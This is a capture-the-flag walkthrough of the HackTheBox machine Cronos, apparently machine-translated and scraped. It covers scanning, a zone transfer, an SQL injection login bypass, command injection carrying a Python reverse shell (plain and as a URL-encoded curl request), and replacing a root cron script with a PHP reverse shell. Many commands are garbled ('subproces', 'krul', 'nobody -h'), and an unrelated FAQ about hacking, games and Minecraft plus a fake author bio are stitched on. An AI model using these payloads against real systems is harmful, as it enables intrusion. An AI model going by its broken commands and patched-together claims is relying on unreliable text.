HackTheBox report — Chronos (2023)

Cronos is an engine that uses simple SQL injection and zone transfer to list its subdirectories. Privilege escalation is quite easy when we discover a PHP file owned by our low-privilege user.

nmap -T4 -p-

Run Nmap 7.70 (https://nmap.org) on Jun 1, 2020. at 11:57 a.m. EDT
Nmap scan report for
The host is active (0.054s latency).
Not shown: 65532 filtered ports
22/tcp Open SSH
53/tcp open domain
80/tcp opent http
Nmap done: 1 IP address scanned (1 host active) in 113.93 seconds

Gates 22, 53 and 80 are open.

nmap -T4 -A -p22,53,80

Run Nmap 7.70 (https://nmap.org) 1.6.2020. at 12:07 p.m. EDT
Nmap scan report for
The host is active (0.051s latency).
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; Protokoll 2.0)
| ssh-hostsleutel:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domein ISC BIND 9.10.3-P4 (Ubuntu Linux)
|_ bind.version: 9.10.3-P4-Free
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http header: Apache2 Ubuntu Default Page: Works
Warning: OSScan results can be unreliable because we couldn't find at least one open and one closed port
Aggressive Operating System Estimates: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92% ) %), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%)
No exact host OS matches (test conditions not ideal).
Network distance: 2 hops
Service information: Operating mode: Linux; CPE: cpe://o:linux:linux_kernel
TRACEROUTE (set to port 53/tcp)
1 51,10 ms
2 51,18 ms
Discovery of operating system and service performed. Please report incorrect results belowhttps://nmap.org/submit/.
Nmap done: 1 IP address scanned (1 host active) in 19.88 seconds

Whenever I see a web server I run a Nikto scan and brute force the directory.

nobody -h

gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -uhttp://> gobuster.txt

HackTheBox report — Chronos (1)

Unfortunately, we don't find much, as you can see below.

HackTheBox report — Chronos (2)
HackTheBox report — Chronos (3)

The web server shows us a standard Apache page. Maybe there is a problem with DNS?

Using nslookup we were able to find the nameserver for cronos.htb:

to look up



HackTheBox report — Chronos (4)

We also do a zone move to see if there are any other domains.

host -l cronos.htb

HackTheBox report — Chronos (5)
(Video) HackTheBox Walkthrough - Cronos




Let's add this to our /etc/hosts file,

echo „ chronos.htb“ >> /etc/hosts

echo „ admin.cronos.htb“ >> /etc/hosts

by a visithttp://cronos.htbIhttp://admin.cronos.htbCheck out what we're bringing back!

HackTheBox report — Chronos (6)
HackTheBox report — Chronos (7)

From here we can restart the brute force directory and Nikto scan on both domains.

nobody -h cronos.htb

gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -uhttp://cronos.htb

nobody -h admin.cronos.htb

gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -uhttp://admin.cronos.htb

HackTheBox report — Chronos (8)

We immediately notice that we get different results:

HackTheBox report — Chronos (9)
Gobuster v1.4.1 PB Reeves (@Colonial)
============================================== == =
============================================== == =
[+] mode: red
[+] URL/domain:http://cronos.htb/
[+] Homework: 10
[+] Glossary: ​​/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Statuscodes: 302.307.200.204.301
============================================== == =
/css (Status: 301)
/js (Status: 301)
============================================== == =
Gobuster v1.4.1 PB Reeves (@Colonial)
============================================== == =
============================================== == =
[+] mode: red
[+] URL/domain:http://admin.cronos.htb/
[+] Homework: 10
[+] Glossary: ​​/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Statuscodes: 204.301.302.307.200
============================================== == =
============================================== == =
Nikto v2.1.6
-------------------------------------------------- ---------------------------------------
+ Target IP:
+ Target hostname:admin.cronos.htb
+ Soul Gate: 80
+ Start time: 01/06/2020 13:21:07 (GMT-4)
-------------------------------------------------- ---------------------------------------
+ Server: Apache/2.4.18 (gratis)
+ The "X-Frame-Options" anti-click-catching header is not present.
+ The X-XSS-Protection header is not defined. This header can provide advice to the user agent to protect against certain forms of XSS
+ The X-Content-Type-Options header is not set. This allows the user agent to render the content of the web page in a non-MIME-like manner
+ PHPSESSID cookie created without the httponly tag
+ No CGI directories found (use "-C all" to force checking all possible directories)
+ Server loses inodes via ETags, header with file/found, fields: 0x30a6 0x555402443a52b
+ The web server returns a valid response using unsolicited HTTP methods, which may result in false positives.
+ /config.php: PHP configuration file can contain database ID and password.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7499 requests: 0 errors and 8 items reported on remote host
+ End time: 01/06/2020 13:29:36 (GMT-4) (509 seconds)
-------------------------------------------------- -------------------
Nikto v2.1.6
-------------------------------------------------- ---------------------------------------
+ Target IP:
+ Target hostname:cronos.htb
+ Soul Gate: 80
+ Start time: 01/06/2020 13:02:19 (GMT-4)
-------------------------------------------------- ---------------------------------------
+ Server: Apache/2.4.18 (gratis)
+ The "X-Frame-Options" anti-click-catching header is not present.
+ The X-XSS-Protection header is not defined. This header can provide advice to the user agent to protect against certain forms of XSS
+ The X-Content-Type-Options header is not set. This allows the user agent to render the content of the web page in a non-MIME-like manner
+ XSRF-TOKEN cookie created without httponly tag
+ No CGI directories found (use "-C all" to force checking all possible directories)
+ Server loses inodes via ETags, headers found with /robots.txt file, fields: 0x18 0x54cae721c43bb
+ Allowed HTTP methods: GET, HEAD
+ OSVDB-3092: /web.config: ASP configuration file is accessible.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7445 requests: 0 errors and 8 items reported on remote host
+ End time: 01.06.2020 13:11:57 (GMT-4) (578 seconds)
-------------------------------------------------- -------------------

Not much has come out of these scenarios, that's where our focus ishttp://admin.cronos.htb.

HackTheBox report — Chronos (10)

We can try to apply administrative credentials, but we already know that this site is vulnerable to SQL injection. On the sheet below, we enter it in the "Username" field and we get administrative access.

(Video) HackTheBox - CronOS

HackTheBox report — Chronos (11)
HackTheBox report — Chronos (12)

By clicking Submit, we gain access.

HackTheBox report — Chronos (13)

From here we can find Net Tool v0.1, this tool gives access to "traceroute" and "ping" commands. Let's see if we can run more commands with ping or traceroute.

We're tracking traceroute, Google's DNS server, and trying to ping it.

We have set up a listener using tcpdump on the tun0 interface.

Since our IP address on this interface is, we will ping this IP address.

HackTheBox report — Chronos (14)
HackTheBox report — Chronos (15)
HackTheBox report — Chronos (16)

As you can see, the number of ping requests is increasing.

Let's load Burp and build a reverse shell by intercepting requests and see what we get back each time.

HackTheBox report — Chronos (17)

As you can see, these requests are "URL encoded". We need to code our reverse shell url to farm and send the request.

HackTheBox report — Chronos (18)

It looks like we have Python on the computer, so we'll use Python's reverse shell.

HackTheBox report — Chronos (19)
(Video) HackTheBox - Cronos | Noob To OSCP Episode #12
python -c 'import socket,subproces,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.bestandsnummer(),0); os.dup2(s.bestandsnummer(),1); os.dup2(s.fileno(),2);p=subproces.call(["/bin/sh","-i"]);'

We connect to our IP through port 443.

Set up a listener and replace the ping request with the above code in burp. Make sure to URL encode using CTRL + U and repeater.

HackTheBox report — Chronos (20)
HackTheBox report — Chronos (21)
HackTheBox report — Chronos (22)

We send a request and we are blessed with a shell!

I have copied the request below into the curl command.

krul -i -s -k -X $'POST' \
-H $'Host: admin.cronos.htb' -H $'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0' -H $'Accept: text/html, application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referrer:http://admin.cronos.htb/welcome.php'-H $'Cookie: PHPSESSID=mpi2m3tie7smsrcbgrfs91si75' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content length: 279' \
-b $'PHPSESSID=mpi2m3tie7smsrcbgrfs91si75' \
--data-binary $'command=traceroute&host=\'import+socket,subproces,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect( (\"\",443))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno (),2)%3bp%3dsubprocess.call([\"/bin/sh\",\"-i\"])%3b\'' \

Let's update the shell with the following command:

python -c 'uvoz pty; pty.spawn("/bin/bash")'



HackTheBox report — Chronos (23)

Once you type "fg + ENTER" after CTRL + Z, the shell will be updated to a fully interactive shell.

HackTheBox report — Chronos (24)

Let's use LinEnum.sh to see how we can raise our privileges to root. To do this, we put LinEnum.sh in our local directory and host an HTTP server. We download it from our victim's machine to the current user's home directory.

python3 -m http.server 80


chmod +x LinEnum.sh

HackTheBox report — Chronos (25)
(Video) Hack The Box Cronos - Walkthrough

From here we can run the script.


HackTheBox report — Chronos (26)

In the script, we notice that the PHP page is running as a cron job in the www directory. We as users of WWW data are interested in this.

Let's see if we have RW permissions for this file - /var/www/laravel/artisan

Surprise! We own it..

HackTheBox report — Chronos (27)

Let's turn the contents of this file into a reverse shell, set up a listener... and have root run a cron job, which (hopefully) gives us a reverse shell with root-level access.

We copied the reverse shell to our local directory at /usr/share/webshells/php/php-reverse-shell.php, renamed the file to rev.php and changed the parameters in it to our own IP/PORT which we use for the shell.

cp /usr/share/webshells/php/php-reverse-shell.php.

mv php-reverse-shell rev.php

HackTheBox report — Chronos (28)

Let's put the file on a local HTTP server and download it to our victim's /tmp directory. From here we will rename it to the name of the PHP page we are going to replace. Make sure to set the listener to the desired port.

python3 -m http.server 80

cd /tmp


mv rev.php Master

nc -nlvp 444

HackTheBox report — Chronos (29)

The last step is to move the file to the destination folder and wait for the cron job to run. According to the cron job, we found out that it is /var/www/laravel/.

cp artisan /var/www/laravel/

HackTheBox report — Chronos (30)
(Video) HackTheBox - CronOS Conquered!

Root.txt is located at /root/root.txt


What are the difficulty levels in Hackthebox? ›

Machines/Boxes come in four separate difficulty levels; Easy, Medium, Hard, and Insane.

What is hack the box? ›

Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them are simulating real world scenarios and some of them lean more towards a CTF style of challenge.

What is the hardest game to hack? ›

10 Hardest Hack And Slash Games Ever Made, Ranked
  • 3 Dark Souls.
  • 4 Ninja Gaiden. ...
  • 5 Nioh 2. ...
  • 6 Metal Gear Rising: Revengeance. ...
  • 7 Devil May Cry 5. ...
  • 8 Bayonetta. ...
  • 9 Dead Cells. ...
  • 10 Hades. ...
Oct 17, 2022

What is the hardest hacker certification? ›

The Offensive Security Certified Professional (OSCP) is a hands-on penetration testing certification widely considered to be the most difficult ethical hacking certification. To earn OSCP, you must complete an online course, then pass a set of OSCE exams over a specific period.

How many people use Hack The Box? ›

The 1.7 million community members that use the platform cover both individuals who have joined HTB on their own steam to learn skills and get certifications, as well as some 1,500 enterprises, universities, governments and other organizations that have sent their teams to HTB to be put through their paces.

Who is the owner of Hack The Box? ›

Haris Pylarinos is the CEO at Hack The Box .

What is the best alternative to Hack The Box? ›

  • TryHackMe. Freemium • Proprietary. Online. ...
  • HackThisSite. Free • Open Source. Penetration Testing Tool. ...
  • PwnTillDawn Online Battlefield. Free • Proprietary. ...
  • Parrot CTFs. Free • Proprietary. ...
  • echoCTF. Free • Open Source. ...
  • Cohackers. Free Personal • Proprietary. ...
  • PENTESTON. Paid • Proprietary. ...
  • VulnHub. Free • Proprietary.
Feb 8, 2023

What do hackers hack most? ›

The biggest motivation is often financial gain. Hackers can make money by stealing your passwords, accessing your bank or credit card details, holding your information to ransom, or selling your data to other hackers or on the dark web.

What is the biggest hack in the world? ›

One of the largest hacks in history was the Marriott International data breach in 2018 that exposed 500 million guest records, including passport details, credit cards, arrival-departure dates, PII, etc.

What is the most common hack? ›

Phishing is the most common hacking technique. All of our inboxes and text messaging apps are filled with phishing messages daily.

What is the hardest job in cyber security? ›

5 Toughest Job Roles to fill in Cyber Security
  1. Blockchain Developer. A Blockchain Developer is responsible for developing interfaces and applications using blockchain technology. ...
  2. Artificial Intelligence Specialist. ...
  3. Cyber Security Engineer. ...
  4. Network Administrator. ...
  5. GDPR Data Protection Officer.
Feb 1, 2021

Who is the most respected hacker? ›

Kevin Mitnick holds the title as the world's most famous hacker ever, with this title dating back to 1995 by the US Department of Justice. Kevin Mitnick started hacking at an early age. He broke into the realm of public attention in the 1980s after he hacked into the North American Defense Command (NORAD).

Who are the most skilled hackers? ›

Top 18 Most Famous Ethical Hackers in the World
  • Ian Murphy. ...
  • Matthew Bevan and Richard Pryce. ...
  • Jeanson James Ancheta. ...
  • Michael Calce. ...
  • Julian Assange. ...
  • Gary McKinnon. ...
  • Adrian Lamo. ...
  • Aaron Swartz.
Feb 10, 2023

What are all the difficulty levels? ›

Easy, Medium, Hard, Extreme, Nightmare–many games present players with a sliding scale of difficulty. The designers give players the choice over their level of challenge.

What are the difficulty levels mod? ›

After peaceful, easy, normal hard, there is now (in order) expert, nightmare, fiendish, cataclysmic, pandemonium, unutterable and insurmountable.

What is the level of difficulty 1 to 5? ›

On a scale of 1 to 5, a 1-2 is easy, a 3 is moderate, and a 4-5 is difficult.

What difficulty number is hard? ›

The raw regional difficulty therefore is always 0.0 on Peaceful and ranges from 0.75 to 1.5 on Easy, 1.5 to 4.0 on Normal, and 2.25 to 6.75 on Hard.

What is the max Dino level at difficulty? ›

Most dinos, like the Dodo, have 30 possible level steps -- this means levels range from 5 to 150, in 5-level increments, with 5.0 Difficulty.

How do you unlock master difficulty? ›

To unlock Master difficulty, you will need to clear a song on Expert difficulty with less than 7 taps that are GOOD or below. This means that the overall number of GOOD taps, as well as BAD and MISS taps, must be below 7.

How do you use difficulty commands? ›

Changing Through Commands
  1. Enter your Minecraft server.
  2. Open the chat, and type in the /difficulty command. Don't send the command just yet, however!
  3. After /difficulty, type in which difficulty you'd like: Peaceful, Easy, Normal or Hard. ...
  4. And that's it!
Oct 8, 2021

What difficulty is 0 in Minecraft? ›

peaceful (can be abbreviated as p or 0 ‌ [Bedrock Edition only]) for peaceful difficulty. easy (can be abbreviated as e or 1 ‌ [Bedrock Edition only]) for easy difficulty. normal (can be abbreviated as n or 2 ‌ [Bedrock Edition only]) for normal difficulty.

What are the levels of mod? ›

Historically, a six-tier system was used: UNCLASSIFIED, PROTECT, RESTRICTED, CONFIDENTIAL, SECRET, and TOP SECRET.

What is the scale of 1 10 difficulty? ›

Scale Rating System: 1 = easy; 10 = extremely difficult or challenging.

What level of difficulty is control? ›

Control has no difficulty settings, but by using Assist Mode you are free to create your own – don't worry, it won't stop you from unlocking trophies and achievements.

What is difficulty level of a test? ›

Count the total number of students answering each item correctly. For each item, divide the number answering correctly by the total number of students. This gives you the proportion of students who answered each item correctly. This figure is called the item's difficulty level.

What are the 3 shades of hackers? ›

Hackers fall into three general categories: black hat hackers, white hat hackers, and gray hat hackers. Although hackers are often associated with exploiting vulnerabilities to gain unauthorized access to computers, systems, or networks, not all hacking is malicious or illegal.

What is the most used hack? ›

Phishing is the most common hacking technique.

How points are awarded in Hackthebox? ›

Points. The Points system is straightforward. Each Box, Challenge, Endgame, or Fortress completed will offer you a number of Points that is based on its complexity. This way, harder tasks will earn you more Points, where easy ones will not earn you as many.


1. HTB Cronos walkthrough - OSCP Preparation
2. hack the box
3. Cronos - HTB
4. I Tried The HackTheBox Certified Pentester Exam
(John Hammond)
5. HackTheBox - MetaTwo
6. Become a Certified Penetration Tester with HackTheBox CPTS!
(John Hammond)
Top Articles
Latest Posts
Article information

Author: Patricia Veum II

Last Updated: 06/20/2023

Views: 5581

Rating: 4.3 / 5 (64 voted)

Reviews: 95% of readers found this page helpful

Author information

Name: Patricia Veum II

Birthday: 1994-12-16

Address: 2064 Little Summit, Goldieton, MS 97651-0862

Phone: +6873952696715

Job: Principal Officer

Hobby: Rafting, Cabaret, Candle making, Jigsaw puzzles, Inline skating, Magic, Graffiti

Introduction: My name is Patricia Veum II, I am a vast, combative, smiling, famous, inexpensive, zealous, sparkling person who loves writing and wants to share my knowledge and understanding with you.